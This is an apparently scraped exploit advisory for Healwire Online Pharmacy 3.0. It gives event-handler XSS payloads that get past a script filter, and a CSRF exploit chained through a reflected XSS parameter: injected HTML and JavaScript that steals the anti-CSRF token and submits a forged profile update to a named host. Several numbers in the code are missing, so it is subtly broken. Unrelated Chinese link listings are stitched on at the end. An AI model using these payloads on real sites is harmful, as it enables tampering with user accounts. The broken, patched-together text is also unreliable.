Healwire Online Pharmacy version 3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploitvulnerabilityxsscsrf

MD5 | 9196695291014c0d67db9bdd80d678ff

# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

# Date: --

# Exploit Author: L0RD

# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499

# Version: 3.0

# Tested on: windows

# POC  : Cross site scripting :

) Create an account and go to your profile.

) When we want to put "<script></script>" in the fields,"script" will be

replaced with null.

so we can bypass this filter by using javascript's events like

"onmouseover" or "oninput" .

Put one of these payloads into the fields :

 - " oninput=alert('xss') "

 - " onmouseover=alert('xss') "

) You will get an alert box inside the page . ( after put something into

the fields or move mouse on the fields)

# POC  : Cross-Site request forgery :

# With csrf vulnerability,attacker can easily change user's authentication.

# So in this script , we have anti-CSRF token .We can't change user's

# information without token.

# but there is a vulnerable parameter which has reflected xss in another page

# of this script.

# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]

# Now we can bypass anti-csrf by this parameter and using javascript:

# Exploit :

"/><form action="

http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"

method="POST">

<input type="hidden" name="first_name" value="a" />

<input type="hidden" name="address"

value="" oninput=alert(document.domain) ""

/>

<input type="hidden" name="pincode" value="a" />

<input type="hidden" name="phone" value="" />

<input type="hidden" name="last_name" value="anything" />

<input type="hidden" name="_token" value="" />

</form>

<script>

var token = ' ';

var req = new XMLHttpRequest();

req.onreadystatechange = function(){

if(this.readyState ==  && this.status == ){

var secPage = this.responseXML;

token = secPage.forms[].elements[].value;

console.log(token);

}

}

req.open("GET","/demo/healwire/account-page",true);

req.responseType = "document";

req.send();

window.setTimeout(function(){

document.forms[].elements[].value = token;

document.forms[].submit();

},)

</script>

# You can also send  ajax requests instead of using form .

# Encode this payload and put this into "msg" parameter

# JSON result after  seconds :

status "SUCCESS"

msg "User profile updated !"

Healwire Online Pharmacy 3.0 Cross Site Request Forgery / Cross Site Scripting的更多相关文章

  1. WebGoat学习——跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF))也被称为:one click at ...

  2. Cross Site Request Forgery (CSRF)--spring security -转

    http://docs.spring.io/spring-security/site/docs/3.2.0.CI-SNAPSHOT/reference/html/csrf.html 13. Cross ...

  3. 跨站请求伪造(Cross Site Request Forgery (CSRF))

    跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Site Request Forgery (CSRF)) 跨站请求伪造(Cross Sit ...

  4. DVWA 黑客攻防演练(十四)CSRF 攻击 Cross Site Request Forgery

    这么多攻击中,CSRF 攻击,全称是 Cross Site Request Forgery,翻译过来是跨站请求伪造可谓是最防不胜防之一.比如删除一篇文章,添加一笔钱之类,如果开发者是没有考虑到会被 C ...

  5. CSRF(Cross Site Request Forgery, 跨站域请求伪造)

    CSRF(Cross Site Request Forgery, 跨站域请求伪造) CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的 ...

  6. CSRF(Cross Site Request Forgery, 跨站请求伪造)

    一.CSRF 背景与介绍 CSRF(Cross Site Request Forgery, 跨站域请求伪造)是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安全隐患之一.其他安全隐患, ...

  7. 转: CSRF(Cross Site Request Forgery 跨站域请求伪造) 背景与介绍

    from:  https://www.ibm.com/developerworks/cn/web/1102_niugang_csrf/   在 IBM Bluemix 云平台上开发并部署您的下一个应用 ...

  8. CSRF Laravel Cross Site Request Forgery protection¶

    Laravel 使得防止应用 遭到跨站请求伪造攻击变得简单. Laravel 自动为每一个被应用管理的有效用户会话生成一个 CSRF "令牌",该令牌用于验证授权用 户和发起请求者 ...

  9. Vulnerability: Cross Site Request Forgery (CSRF)

    CSRF跨站请求伪造 这是一种网络攻击方式,也被称为one-click attack或者session riding 攻击原理 CSRF攻击利用网站对于用户网页浏览器的信任,挟持用户当前已登陆的Web ...

随机推荐

  1. Storm 提交多个流例程

    1.拓扑(Topology): builder.setBolt(TRANSFORM_BOLT, new TransformationBolt(), 1).shuffleGrouping(MY_SPOU ...

  2. Oracle12c中性能优化&amp;功能增强新特性之临时undo

    临时表最有意思的特点之一是undo段也存储在常规undo表空间中,而它们的undo反过来被redo保护,这会导致一些问题. 1)  写undo表空间需要数据库以读写模式打开,因此,只读数据库和物理备库 ...

  3. linux下安装xhprof

    https://jingyan.baidu.com/article/a24b33cd7ee1d519ff002b6d.html

  4. php能做什么

    PHP(“PHP: Hypertext Preprocessor”,超文本预处理器的字母缩写)是一种被广泛应用的开放源代码的多用途脚本语言,它可嵌入到 HTML中,尤其适合 web 开发. PHP能做 ...

  5. ScalaPB(2): 在scala中用gRPC实现微服务

    gRPC是google开源提供的一个RPC软件框架,它的特点是极大简化了传统RPC的开发流程和代码量,使用户可以免除许多陷阱并聚焦于实际应用逻辑中.作为一种google的最新RPC解决方案,gRPC具 ...

  6. Flask入门之flask-wtf表单处理

    参考文章 1. 使用 WTForms 进行表单验证  第11集 #Sample.py # coding:utf-8 from flask import Flask,render_template,re ...

  7. 如何利用Python网络爬虫爬取微信朋友圈动态--附代码(下)

    前天给大家分享了如何利用Python网络爬虫爬取微信朋友圈数据的上篇(理论篇),今天给大家分享一下代码实现(实战篇),接着上篇往下继续深入. 一.代码实现 1.修改Scrapy项目中的items.py ...

  8. Python_语法和界面设计

    http://www.runoob.com/python/python-gui-tkinter.html  http://www.python-course.eu/python_tkinter.php

  9. Python_网页爬虫

    import sys import multiprocessing import re import os import urllib.request as lib def craw_links( u ...

  10. DoxygenToolKit.vim 插件配置

    如何才能既享受 Doxygen 的强大功能,同时又避免大量的重复性的注释内容? 解决思路: 让编辑器来替我们写那些格式和内容固定的部分,我们只负责写真正的有效内容. 所以,答案就是:Vim + Dox ...